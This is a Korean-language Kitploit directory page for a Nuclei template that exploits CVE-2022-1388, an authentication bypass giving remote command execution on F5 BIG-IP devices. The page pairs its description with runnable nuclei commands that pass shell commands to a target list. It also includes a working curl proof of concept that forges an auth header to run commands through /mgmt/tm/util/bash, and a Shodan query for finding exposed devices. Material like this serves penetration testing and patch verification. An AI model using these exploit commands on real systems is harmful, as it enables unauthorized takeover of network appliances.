Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388은 CVSSv3 점수 9.8을 받은 BIG-IP의 iControl API REST 구성 요소의 인증 우회 취약점입니다. iControl REST API는 BIG-IP 장치의 관리 및 구성에 사용됩니다. CVE-2022-1388은 BIG-IP를 사용하는 장치의 관리 포트 또는 자체 IP 주소에 네트워크로 접근할 수 있는 인증되지 않은 공격자에 의해 악용될 수 있습니다. 악용에 성공하면 공격자는 임의의 시스템 명령을 실행하고, 파일을 생성·삭제하며, 서비스를 비활성화할 수 있습니다. | Kitploit
도구/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

소개

저장소 보기
624년 전아직 검토되지 않음

CVE-2022-1388은 CVSSv3 점수 9.8을 받은 BIG-IP의 iControl API REST 구성 요소의 인증 우회 취약점입니다. iControl REST API는 BIG-IP 장치의 관리 및 구성에 사용됩니다. CVE-2022-1388은 BIG-IP를 사용하는 장치의 관리 포트 또는 자체 IP 주소에 네트워크로 접근할 수 있는 인증되지 않은 공격자에 의해 악용될 수 있습니다. 악용에 성공하면 공격자는 임의의 시스템 명령을 실행하고, 파일을 생성·삭제하며, 서비스를 비활성화할 수 있습니다.

공유

Nuclei 템플릿 F5 BIG-IP iControl REST 인증 우회 RCE 익스플로잇 | 명령 매개변수

CVE-2022-1388은 BIG-IP iControl API의 REST 구성 요소에 대한 인증 우회 취약점으로, CVSSv3 점수 9.8을 부여받았습니다. iControl REST API는 BIG-IP 장치의 관리 및 구성에 사용됩니다. CVE-2022-1388은 BIG-IP를 사용하는 장치의 관리 포트 또는 자체 IP 주소에 네트워크 접근 권한이 있는 인증되지 않은 공격자에 의해 악용될 수 있습니다. 악용에 성공하면 공격자는 임의의 시스템 명령을 실행하고, 파일을 생성·삭제하며, 서비스를 비활성화할 수 있습니다.

이 템플릿은 token-spray / nuclei의 CLI 변수를 사용합니다

이 nuclei 템플릿은 악용을 위해 셸 매개변수를 허용합니다. 우리는 다른 워크플로우 또는 수동 검색에서 얻은 토큰을 테스트하고자 nuclei의 CLI 변수 기능을 사용하여 실행 시 단일 토큰 값 또는 토큰 목록을 이 템플릿에 동적으로 전달했습니다.

-V, -var value var=value 형식의 사용자 지정 변수

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Captura de tela de 2022-05-10 01-28-12

수동 POC

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

추가 세부 정보

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

참고 자료

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml
도구 다운로드